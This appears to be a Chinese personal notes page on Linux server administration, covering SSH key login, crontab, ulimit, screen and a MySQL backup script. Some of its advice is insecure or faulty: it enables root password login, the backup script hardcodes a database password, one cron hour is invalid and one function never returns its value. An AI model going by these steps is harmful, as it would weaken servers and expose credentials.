Enter passphrase (empty for no passphrase): &lt;== 输入密钥锁码，或直接按 Enter 留空
Enter same passphrase again: &lt;== 再输入一遍密钥锁码
Your identification has been saved in /root/.ssh/id_rsa. &lt;== 私钥
Your public key has been saved in /root/.ssh/id_rsa.pub. &lt;== 公钥
The key fingerprint is:
0f:d3:e7:1a:1c:bd:5c:03:f1:19:f1:22:df:9b:cc:08 root@host

</code></pre></div><p>在 当前 用户的家目录中生成了一个 <code>.ssh</code> 的隐藏目录，内含两个密钥文件。<code>id_rsa</code> 为私钥，<code>id_rsa.pub</code> 为公钥。</p> <ul><li><p>关于此处操作对于阿里云服务器也可以直接在阿里云的“<strong>网络与安全</strong>”-&gt; &quot;<strong>密钥对</strong>&quot;中由阿里云生成。阿里云： https://developer.aliyun.com/article/666688</p></li> <li><p>你也可以使用xshell或者puttygen工具等在你自己的机器上产生对应的公钥，然后把<strong>公钥导出为私钥</strong>。</p></li></ul> <h3 id="_2-在服务器上安装公钥"><a href="#_2-在服务器上安装公钥" class="header-anchor">#</a> 2. 在服务器上安装公钥</h3> <p>登陆需要配置密钥登陆的服务器，将公钥内容填入~/.ssh/authorized_keys文件中：</p> <div class="language- extra-class"><pre class="language-text"><code>$ mkdir ~/.ssh
$ cat ~/.ssh/id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys
# 或者如果是客户端自己产生的可以直接编辑
$ nano ~/.ssh/authorized_keys
</code></pre></div><p><strong>注意</strong>：保存后，对<code>.ssh</code>目录和其中的<code>authorized_keys</code>公钥文件设置相应的权限：</p> <div class="language- extra-class"><pre class="language-text"><code>chown -R root:root ~/.ssh
chmod -R 700  ~/.ssh
chmod -R 644  ~/.ssh/authorized_keys

</code></pre></div><h3 id="_3-设置ssh，打开公钥登录功能"><a href="#_3-设置ssh，打开公钥登录功能" class="header-anchor">#</a> 3. 设置SSH，打开公钥登录功能</h3> <p>接着修改ssh配置文件：</p> <div class="language- extra-class"><pre class="language-text"><code>nano /etc/ssh/sshd_config
</code></pre></div><p>对以下内容去掉注释：</p> <div class="language- extra-class"><pre class="language-text"><code>RSAAuthentication yes
PubkeyAuthentication yes
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys
# 记得最后面加上这个，否则无法进行密码登录
PasswordAuthentication yes
</code></pre></div><p>保存后重启sshd服务：</p> <div class="language- extra-class"><pre class="language-text"><code>systemctl restart sshd
</code></pre></div><h3 id="_4-xshell等客户端将私钥下载到客户端，然后使用"><a href="#_4-xshell等客户端将私钥下载到客户端，然后使用" class="header-anchor">#</a> 4. XShell等客户端将私钥下载到客户端，然后使用</h3> <ul><li>如果是通过<code>ssh-keygen</code>在服务器产生的公钥和私钥,从服务器下载私钥文件： <code>/root/.ssh/id_rsa</code>， 然后在xshell中进行连接使用。</li> <li>如果是自己的电脑上产生的公钥，需要将公钥导出为私钥被保存，然后登录时候使用该私钥。如下截图：
<img src="https://raw.githubusercontent.com/alterhu2020/StorageHub/master/img/20200711175803-2020-07-11.png" alt="20200711175803-2020-07-11"></li></ul> <h3 id="_5-关闭原密码登陆方式-小心注意"><a href="#_5-关闭原密码登陆方式-小心注意" class="header-anchor">#</a> 5. 关闭原密码登陆方式(小心注意)</h3> <p>如果使用密钥登陆成功，可以继续修改ssh配置文件，关闭密码登陆：</p> <div class="language- extra-class"><pre class="language-text"><code>nano /etc/ssh/sshd_config
</code></pre></div><p>设置：</p> <div class="language- extra-class"><pre class="language-text"><code>PasswordAuthentication no
</code></pre></div><p>保存后重启sshd服务的步骤同上，这样就完成了密钥登陆的配置。</p> <h2 id="linux中cache内存占用过高解决办法"><a href="#linux中cache内存占用过高解决办法" class="header-anchor">#</a> Linux中Cache内存占用过高解决办法</h2> <p>文章来源: <a href="https://blog.csdn.net/ailice001/article/details/80353924" target="_blank" rel="noopener noreferrer">解决Linux buffer/cache内存占用过高的办法<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></p> <ol><li>在Linux系统中，我们经常用free命令来查看系统内存的使用状态。</li> <li>如何回收cache？</li></ol> <div class="language- extra-class"><pre class="language-text"><code>$ sudo sh -c &quot;echo 1 &gt; /proc/sys/vm/drop_caches&quot;:表示清除pagecache。
$ sudo sh -c &quot;echo 2 &gt; /proc/sys/vm/drop_caches&quot;:表示清除回收slab分配器中的对象（包括目录项缓存和inode缓存）。slab分配器是内核中管理内存的一种机制，其中很多缓存数据实现都是用的pagecache。
$ sudo sh -c &quot;echo 3 &gt; /proc/sys/vm/drop_caches&quot;:表示清除pagecache和slab分配器中的缓存对象。
</code></pre></div><h2 id="查看当前运行的进程的详细路径"><a href="#查看当前运行的进程的详细路径" class="header-anchor">#</a> 查看当前运行的进程的详细路径</h2> <p>使用命令：</p> <div class="language- extra-class"><pre class="language-text"><code>$ top -c
</code></pre></div><h2 id="通过进程pid查看进程"><a href="#通过进程pid查看进程" class="header-anchor">#</a> 通过进程pid查看进程</h2> <p>执行命令：</p> <div class="language- extra-class"><pre class="language-text"><code>$ ls  -l /proc/pid
例如：
$ ls -ls /proc/1245
</code></pre></div><h2 id="查看进程占用排序"><a href="#查看进程占用排序" class="header-anchor">#</a> 查看进程占用排序</h2> <div class="language- extra-class"><pre class="language-text"><code>$ ps -aux --sort=-pcpu|head -10

</code></pre></div><h2 id="查看定时任务-crontab命令"><a href="#查看定时任务-crontab命令" class="header-anchor">#</a> 查看定时任务 crontab命令</h2> <div class="language- extra-class"><pre class="language-text"><code># 查看定时任务
$ crontab -l  
# 编辑定时任务，删除或者注释定时任务
$ crontab -e
# 编辑，针对的是root用户
$ nano /etc/crontab
# 停止crontab，启动crontab任务
$ systemctl stop cron
$ systemctl restart cron
</code></pre></div><h3 id="etc-crontab文件和crontab-e命令区别"><a href="#etc-crontab文件和crontab-e命令区别" class="header-anchor">#</a> <code>/etc/crontab</code>文件和<code>crontab -e</code>命令区别</h3> <ol><li>格式不同。</li> <li>修改/etc/crontab这种方法只有root用户能用，而crontab -e这种所有用户都可以使用，普通用户也只能为自己设置计划任务。然后自动写入<code>/var/spool/cron/usename</code>。</li> <li>不管用 <code>crontab -e</code> or 改 <code>/etc/crontab</code> 都不需要重新启动 crond 服务</li></ol> <h2 id="设置时区"><a href="#设置时区" class="header-anchor">#</a> 设置时区</h2> <p>参考设置连接: <a href="https://www.cnblogs.com/yoyotl/p/8151409.html" target="_blank" rel="noopener noreferrer">Debian 8 设置时区和时间配置<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></p> <div class="language- extra-class"><pre class="language-text"><code>$ tzselect
</code></pre></div><h2 id="查看文件夹各个文件大小"><a href="#查看文件夹各个文件大小" class="header-anchor">#</a> 查看文件夹各个文件大小</h2> <div class="language- extra-class"><pre class="language-text"><code>$ du -sh *
</code></pre></div><h2 id="查看linux的架构-32-bit-or-64-bit"><a href="#查看linux的架构-32-bit-or-64-bit" class="header-anchor">#</a> 查看linux的架构 32-bit or 64-bit</h2> <div class="language- extra-class"><pre class="language-text"><code># 32位还是64位
uname -a
# 下面命令显示CPU架构
lscpu
$ cat /proc/cpuinfo 
Processor       : ARMv7 Processor rev 10 (v7l)
ARMv7 (and below) is 32-bit. ARMv8 introduces the 64-bit instruction set.
If you want to see whether your system supports 64-bit binaries, check the kernel architecture:
$ uname -m
</code></pre></div><h2 id="查看本机打开的端口号"><a href="#查看本机打开的端口号" class="header-anchor">#</a> 查看本机打开的端口号</h2> <p>默认情况下Linux的1024以下端口是只有root用户才有权限占用,我们的tomcat,apache, nginx等等程序如果想要用普通用户来占用80端口的话就会抛出 java.net.BindException: Permission denied的异常。</p> <div class="language- extra-class"><pre class="language-text"><code>查看指定的端口
$ sudo lsof -i:port

查看所有端口
$ sudo netstat -aptn
</code></pre></div><h2 id="创建链接"><a href="#创建链接" class="header-anchor">#</a> 创建链接</h2> <p>在当前目录创建一个链接名称<code>python</code>,这个链接指向的位置是: <code>/usr/local/bin/python</code>,命令如下:
ln -s 源文件 目标目录</p> <div class="language- extra-class"><pre class="language-text"><code>$ ln -s /usr/local/bin/python python
</code></pre></div><h2 id="删除缓存的安装失败的包"><a href="#删除缓存的安装失败的包" class="header-anchor">#</a> 删除缓存的安装失败的包</h2> <p>进入目录<code>/var/cache/apt/archives</code>,删除下面的所有.deb文件即可</p> <h2 id="修改用户名"><a href="#修改用户名" class="header-anchor">#</a> 修改用户名</h2> <div class="language- extra-class"><pre class="language-text"><code>$ sudo passwd
</code></pre></div><h2 id="ssh登录失败"><a href="#ssh登录失败" class="header-anchor">#</a> ssh登录失败</h2> <ol><li>进入谷歌云实例面板</li> <li>切换到root角色,命令: <code>sudo -i</code></li> <li>修改SSH配置文件<code>/etc/ssh/sshd_config</code>为如下内容:</li></ol> <div class="language- extra-class"><pre class="language-text"><code># Authentication:
PermitRootLogin yes //默认为no，需要开启root用户访问改为yes

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes //默认为no，改为yes开启密码登陆
</code></pre></div><ol start="4"><li>给root用户设置密码 <code>passwd root</code></li> <li>重启ssh服务:    <code>/etc/init.d/ssh restart</code></li> <li>在xshell中，直接使用root账号密码登录。</li></ol> <p>在客户端或者服务端进行如下ssh链接,查看ssh登录失败的log:</p> <div class="language- extra-class"><pre class="language-text"><code>&gt; ssh -vvv alterhu2020@host 
</code></pre></div><p>On the server end, check the logs. <code>/var/log/auth.log</code> will give you a pretty good idea about what happens when you try to login, look for messages that contain sshd. There are a variety of reasons why authentication could be failing, ranging from simple (you aren't using the right username) to more complicated (sshd is configured to use the wrong authentication system).</p> <p>如果以上还不行,直接通过root登录.</p> <h2 id="改变当前用户组"><a href="#改变当前用户组" class="header-anchor">#</a> 改变当前用户组</h2> <div class="language- extra-class"><pre class="language-text"><code>$ sudo usermod -g www-data alterhu2020   (需要重启机器生效)
$ groups alterhu2020
$ sudo nano /etc/sudoers
</code></pre></div><h2 id="unzip命令中文文件名乱码"><a href="#unzip命令中文文件名乱码" class="header-anchor">#</a> unzip命令中文文件名乱码</h2> <p>采用最新的unzip命令没有参数<code>-O</code>，网上提到的使用参数<code>-O</code>可以指定编码，所以这个访问不能使用。所以使用<code>unar</code>命令:</p> <div class="language- extra-class"><pre class="language-text"><code>$ sudo apt-get install unar

$ unar -e gb18030 gb18030.zip
</code></pre></div><h2 id="配置linux并发最大打开文件数"><a href="#配置linux并发最大打开文件数" class="header-anchor">#</a> 配置linux并发最大打开文件数</h2> <p>进行目录<code>/etc/profile</code>添加如下配置信息:</p> <div class="language- extra-class"><pre class="language-text"><code># node环境变量
export PATH=/opt/node/node-v12.14.1-linux-armv7l/bin:$PATH

# java环境变量
export JAVA_HOME=/opt/jdk/jdk1.8.0_241
export JRE_HOME=$JAVA_HOME/jre
export PATH=$JAVA_HOME/bin:$PATH
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar

# 设置pipenv
export PATH=$HOME/.local/bin:$PATH

# 设置最大文件数,mysql和websock最大连接数
ulimit -u 1048576
ulimit -n 1048576
ulimit -d unlimited
ulimit -m unlimited
ulimit -s unlimited
ulimit -t unlimited
ulimit -v unlimited

</code></pre></div><p>以上的配置如果用非root用户双概述可能会出现错误: <code>-bash: ulimit: max user processes: cannot modify limit:</code>. 需要修改对应配置文件: <code>/etc/security/limits.conf</code>, 在文件末尾增加如下配置信息(* 代表的是任意用户,比如root/pi),命令如下:</p> <p><code>$ sudo nano /etc/security/limits.conf</code></p> <div class="language- extra-class"><pre class="language-text"><code>* soft noproc 1048576
* hard noproc 1048576
* soft nofile 1048576
* hard nofile 1048576

</code></pre></div><h2 id="定时备份mysql数据库，保存7天记录脚本"><a href="#定时备份mysql数据库，保存7天记录脚本" class="header-anchor">#</a> 定时备份mysql数据库，保存7天记录脚本</h2> <p>脚本参考来源:</p> <ul><li><a href="https://gist.github.com/tleish/1c6e788c84f59200446b" target="_blank" rel="noopener noreferrer">mysql定时备份脚本(推荐)<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li> <li><a href="https://graspingtech.com/schedule-backup-mysql-databases-ubuntu-16-04/" target="_blank" rel="noopener noreferrer">mysql备份脚本<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a></li></ul> <ul><li>mysql备份脚本：</li></ul> <div class="language-shell extra-class"><pre class="language-shell"><code><span class="token shebang important">#!/bin/bash</span>
<span class="token comment">#==============================================================================</span>
<span class="token comment">#TITLE:            mysql_backup.sh</span>
<span class="token comment">#DESCRIPTION:      script for automating the daily mysql backups on development computer</span>
<span class="token comment">#AUTHOR:           tleish</span>
<span class="token comment">#DATE:             2013-12-20</span>
<span class="token comment">#VERSION:          0.4</span>
<span class="token comment">#USAGE:            ./mysql_backup.sh</span>
<span class="token comment">#CRON:</span>
  <span class="token comment"># example cron for daily db backup @ 9:15 am</span>
  <span class="token comment"># min  hr mday month wday command</span>
  <span class="token comment"># 15   9  *    *     *    /opt/backup/scripts/mysql_backup.sh</span>

<span class="token comment">#RESTORE FROM BACKUP</span>
  <span class="token comment">#$ gunzip &lt; [backupfile.sql.gz] | mysql -u [uname] -p[pass] [dbname]</span>

<span class="token comment">#==============================================================================</span>
<span class="token comment"># CUSTOM SETTINGS</span>
<span class="token comment">#==============================================================================</span>

<span class="token comment"># directory to put the backup files</span>
<span class="token assign-left variable">BACKUP_DIR</span><span class="token operator">=</span>/opt/backup

<span class="token comment"># MYSQL Parameters</span>
<span class="token assign-left variable">MYSQL_UNAME</span><span class="token operator">=</span><span class="token string">&quot;syscorer&quot;</span>
<span class="token assign-left variable">MYSQL_PWORD</span><span class="token operator">=</span><span class="token string">&quot;s6stest2n3gz&quot;</span>


<span class="token assign-left variable">credentialsFile</span><span class="token operator">=</span><span class="token string">&quot;mysql-credentials.cnf&quot;</span>
<span class="token builtin class-name">echo</span> <span class="token string">&quot;[client]&quot;</span> <span class="token operator">&gt;</span> <span class="token variable">$credentialsFile</span>
<span class="token builtin class-name">echo</span> <span class="token string">&quot;user=<span class="token variable">$MYSQL_UNAME</span>&quot;</span> <span class="token operator">&gt;&gt;</span> <span class="token variable">$credentialsFile</span>
<span class="token builtin class-name">echo</span> <span class="token string">&quot;password=<span class="token variable">$MYSQL_PWORD</span>&quot;</span> <span class="token operator">&gt;&gt;</span> <span class="token variable">$credentialsFile</span>
<span class="token builtin class-name">echo</span> <span class="token string">&quot;host=localhost&quot;</span> <span class="token operator">&gt;&gt;</span> <span class="token variable">$credentialsFile</span>

<span class="token comment"># Don't backup databases with these names </span>
<span class="token comment"># Example: starts with mysql (^mysql) or ends with _schema (_schema$)</span>
<span class="token assign-left variable">IGNORE_DB</span><span class="token operator">=</span><span class="token string">&quot;(^mysql|_schema|sys$)&quot;</span>

<span class="token comment"># include mysql and mysqldump binaries for cron bash user</span>
<span class="token assign-left variable"><span class="token environment constant">PATH</span></span><span class="token operator">=</span><span class="token environment constant">$PATH</span>:/usr/local/mysql/bin

<span class="token comment"># Number of days to keep backups</span>
<span class="token assign-left variable">KEEP_BACKUPS_FOR</span><span class="token operator">=</span><span class="token number">7</span> <span class="token comment">#days</span>

<span class="token comment">#==============================================================================</span>
<span class="token comment"># METHODS</span>
<span class="token comment">#==============================================================================</span>

<span class="token comment"># YYYY-MM-DD</span>
<span class="token assign-left variable">TIMESTAMP</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span><span class="token function">date</span> +%F<span class="token variable">)</span></span>

<span class="token keyword">function</span> <span class="token function-name function">delete_old_backups</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
  <span class="token builtin class-name">echo</span> <span class="token string">&quot;Deleting <span class="token variable">$BACKUP_DIR</span>/*.sql.gz older than <span class="token variable">$KEEP_BACKUPS_FOR</span> days&quot;</span>
  <span class="token function">find</span> <span class="token variable">$BACKUP_DIR</span> -type f -name <span class="token string">&quot;*.sql.gz&quot;</span> -mtime +<span class="token variable">$KEEP_BACKUPS_FOR</span> -exec <span class="token function">rm</span> -rf <span class="token punctuation">{</span><span class="token punctuation">}</span> <span class="token punctuation">\</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">mysql_login</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token comment"># local mysql_login=&quot;-u $MYSQL_UNAME&quot; </span>
  <span class="token comment"># if [ -n &quot;$MYSQL_PWORD&quot; ]; then</span>
  <span class="token comment">#   local mysql_login+=&quot; -p$MYSQL_PWORD&quot; </span>
  <span class="token comment"># fi</span>
  <span class="token comment"># echo $mysql_login</span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">mysql_login</span><span class="token operator">=</span><span class="token string">&quot;--defaults-extra-file=<span class="token variable">$credentialsFile</span>&quot;</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">database_list</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">show_databases_sql</span><span class="token operator">=</span><span class="token string">&quot;SHOW DATABASES WHERE \<span class="token variable"><span class="token variable">`</span>Database<span class="token punctuation">\</span><span class="token variable">`</span></span> NOT REGEXP '<span class="token variable">$IGNORE_DB</span>'&quot;</span>
  <span class="token builtin class-name">echo</span> <span class="token variable"><span class="token variable">$(</span>mysql <span class="token punctuation">$(</span>mysql_login<span class="token punctuation">)</span> -e <span class="token string">&quot;<span class="token variable">$show_databases_sql</span>&quot;</span><span class="token operator">|</span><span class="token function">awk</span> -F <span class="token string">&quot; &quot;</span> <span class="token string">'{if (NR!=1) print <span class="token variable">$1</span>}'</span><span class="token variable">)</span></span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">echo_status</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
  <span class="token builtin class-name">printf</span> <span class="token string">'<span class="token entity" title="\r">\r</span>'</span><span class="token punctuation">;</span> 
  <span class="token builtin class-name">printf</span> <span class="token string">' %0.s'</span> <span class="token punctuation">{</span><span class="token number">0</span><span class="token punctuation">..</span><span class="token number">100</span><span class="token punctuation">}</span> 
  <span class="token builtin class-name">printf</span> <span class="token string">'<span class="token entity" title="\r">\r</span>'</span><span class="token punctuation">;</span> 
  <span class="token builtin class-name">printf</span> <span class="token string">&quot;<span class="token variable">$1</span>&quot;</span><span class="token string">'<span class="token entity" title="\r">\r</span>'</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">backup_database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token assign-left variable">backup_file</span><span class="token operator">=</span><span class="token string">&quot;<span class="token variable">$BACKUP_DIR</span>/<span class="token variable">$TIMESTAMP</span>.<span class="token variable">$database</span>.sql.gz&quot;</span> 
    <span class="token assign-left variable">output</span><span class="token operator">+=</span><span class="token string">&quot;<span class="token variable">$database</span> =&gt; <span class="token variable">$backup_file</span><span class="token entity" title="\n">\n</span>&quot;</span>
    echo_status <span class="token string">&quot;...backing up <span class="token variable">$count</span> of <span class="token variable">$total</span> databases: <span class="token variable">$database</span>&quot;</span>
    <span class="token variable"><span class="token variable">$(</span>mysqldump <span class="token punctuation">$(</span>mysql_login<span class="token punctuation">)</span> $database <span class="token operator">|</span> <span class="token function">gzip</span> -9 <span class="token operator">&gt;</span> $backup_file<span class="token variable">)</span></span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">backup_databases</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">databases</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span>database_list<span class="token variable">)</span></span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">total</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span><span class="token builtin class-name">echo</span> $databases <span class="token operator">|</span> <span class="token function">wc</span> -w <span class="token operator">|</span> <span class="token function">xargs</span><span class="token variable">)</span></span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">output</span><span class="token operator">=</span><span class="token string">&quot;&quot;</span>
  <span class="token builtin class-name">local</span> <span class="token assign-left variable">count</span><span class="token operator">=</span><span class="token number">1</span>
  <span class="token keyword">for</span> <span class="token for-or-select variable">database</span> <span class="token keyword">in</span> <span class="token variable">$databases</span><span class="token punctuation">;</span> <span class="token keyword">do</span>
    backup_database
    <span class="token builtin class-name">local</span> <span class="token assign-left variable">count</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$((</span>count<span class="token operator">+</span><span class="token number">1</span><span class="token variable">))</span></span>
  <span class="token keyword">done</span>
  <span class="token builtin class-name">echo</span> -ne <span class="token variable">$output</span> <span class="token operator">|</span> <span class="token function">column</span> -t
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function-name function">hr</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
  <span class="token builtin class-name">printf</span> <span class="token string">'=%.0s'</span> <span class="token punctuation">{</span><span class="token number">1</span><span class="token punctuation">..</span><span class="token number">100</span><span class="token punctuation">}</span>
  <span class="token builtin class-name">printf</span> <span class="token string">&quot;<span class="token entity" title="\n">\n</span>&quot;</span>
<span class="token punctuation">}</span>

<span class="token comment">#==============================================================================</span>
<span class="token comment"># RUN SCRIPT</span>
<span class="token comment">#==============================================================================</span>
delete_old_backups
hr
backup_databases
hr
<span class="token builtin class-name">printf</span> <span class="token string">&quot;All backed up!<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&quot;</span>

</code></pre></div><ul><li>复制上面的脚本文件到目录: <code>/opt/backup/scripts/mysql_backup.sh</code>,执行如下命令赋予执行权限：</li></ul> <div class="language-shell extra-class"><pre class="language-shell"><code>$ <span class="token function">sudo</span> <span class="token function">chmod</span> +x mysql_backup.sh
</code></pre></div><ul><li>执行如下命令，测试脚本是否正常:</li></ul> <div class="language-shell extra-class"><pre class="language-shell"><code>$ <span class="token function">sudo</span> ./mysql_backup.sh
</code></pre></div><ul><li>创建<code>Crontab</code>定时任务
Usually, you should open your personal crontab file using <code>crontab -e</code> command, however if you are root user and decide to choose system wide crontab file, you need to edit the crontab file located in <code>/etc/crontab</code>.现在创建一个定时脚本每天夜里执行备份操作：</li></ul> <div class="language-shell extra-class"><pre class="language-shell"><code><span class="token comment"># 立即生效</span>
$ <span class="token function">sudo</span> <span class="token function">crontab</span> -e
<span class="token comment"># 需要执行重启服务才能生效: sudo systemctl restart cron.service ,不推荐。语法不一样，可能导致不执行</span>
$ <span class="token function">sudo</span> <span class="token function">nano</span> /etc/crontab
</code></pre></div><p>我们知道定时任务可以写到/etc/crontab与crontab -e下面，但你知道两者的区别吗?</p> <p>语法不同</p> <p>/etc/crontab</p> <div class="language-sh extra-class"><pre class="language-sh"><code><span class="token comment"># For details see man 4 crontabs</span>
 
<span class="token comment"># Example of job definition:</span>
<span class="token comment"># .---------------- minute (0 - 59)</span>
<span class="token comment"># |  .------------- hour (0 ar- 23)</span>
<span class="token comment"># |  |  .---------- day of month (1 - 31)</span>
<span class="token comment"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...</span>
<span class="token comment"># |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat</span>
<span class="token comment"># |  |  |  |  |</span>
<span class="token comment"># *  *  *  *  * user-name  command to be executed</span>
``<span class="token variable"><span class="token variable">`</span> 
 
 
<span class="token function">crontab</span> -e
<span class="token variable">`</span></span>``sh
*  *  *  *  *  <span class="token builtin class-name">command</span>
</code></pre></div><p>使用范围
修改<code>/etc/crontab</code>这种方法只有root用户能用，这种方法更加方便与直接直接给其他用户设置计划任务，而且还可以指定执行shell等等， <code>crontab -e</code>这种所有用户都可以使用，普通用户也只能为自己设置计划任务。然后自动写入/var/spool/cron/usename</p> <p>所以推荐使用： <code>sudo crontab -e</code></p> <p>按照提示添加最后一行定时脚本：</p> <div class="language-shell extra-class"><pre class="language-shell"><code><span class="token comment"># Running Cron job Daily</span>
@daily /opt/backup/scripts/mysql_backup.sh <span class="token operator">&gt;&gt;</span> /var/log/mysql/mysql-backup.log <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span><span class="token file-descriptor important">&amp;1</span>
<span class="token comment"># Running Cron job at 2AM Daily</span>
<span class="token number">0</span> <span class="token number">2</span> * * * /opt/backup/scripts/mysql_backup.sh <span class="token operator">&gt;&gt;</span> /var/log/mysql/mysql-backup.log <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span><span class="token file-descriptor important">&amp;1</span>

<span class="token comment"># Running Cron job at 12AM &amp; 12PM Daily</span>
<span class="token number">0</span> <span class="token number">12,24</span> * * * /opt/backup/scripts/mysql_backup.sh <span class="token operator">&gt;&gt;</span> /var/log/mysql/mysql-backup.log <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span><span class="token file-descriptor important">&amp;1</span>

</code></pre></div><ul><li>查看执行情况（crontab执行 日志）</li></ul> <p>执行结果不论是否成功，都会在 <code>/var/spool/mail/mail</code>文件中有<code>crontab</code>执行日志的记录,另外可以自己指定日志目录，参考后面的命令参数。
<!----></p> <h2 id="ssh-或者telent登录linux后screen后台运行脚本"><a href="#ssh-或者telent登录linux后screen后台运行脚本" class="header-anchor">#</a> SSH 或者telent登录linux后screen后台运行脚本</h2> <p>Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话，并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。后台运行命令。</p> <p>在Screen环境下，所有的会话都独立的运行，并拥有各自的编号、输入、输出和窗口缓存。用户可以通过快捷键在不同的窗口下切换，并可以自由的重定向各个窗口的输入和输出。</p> <ul><li>安装</li></ul> <div class="language-shell extra-class"><pre class="language-shell"><code>$ <span class="token function">sudo</span> <span class="token function">apt</span> <span class="token function">install</span> <span class="token function">screen</span>
</code></pre></div><ul><li>命令说明</li></ul> <ol><li>执行<code>screen</code>即可打开一个session，或者加上参数<code>-s</code>设置一个session的名称（推荐):</li></ol> <div class="language-shell extra-class"><pre class="language-shell"><code>$ <span class="token function">screen</span>
$ <span class="token function">screen</span> -S yourname -<span class="token operator">&gt;</span> 新建一个叫yourname的session
$ <span class="token function">screen</span> -ls         -<span class="token operator">&gt;</span> 列出当前所有的session
$ <span class="token function">screen</span> -r yourname -<span class="token operator">&gt;</span> 回到切换yourname这个session
$ <span class="token function">screen</span> -d yourname -<span class="token operator">&gt;</span> 远程detach某个session
$ <span class="token function">screen</span> -d -r yourname -<span class="token operator">&gt;</span> 结束当前session并回到yourname这个session

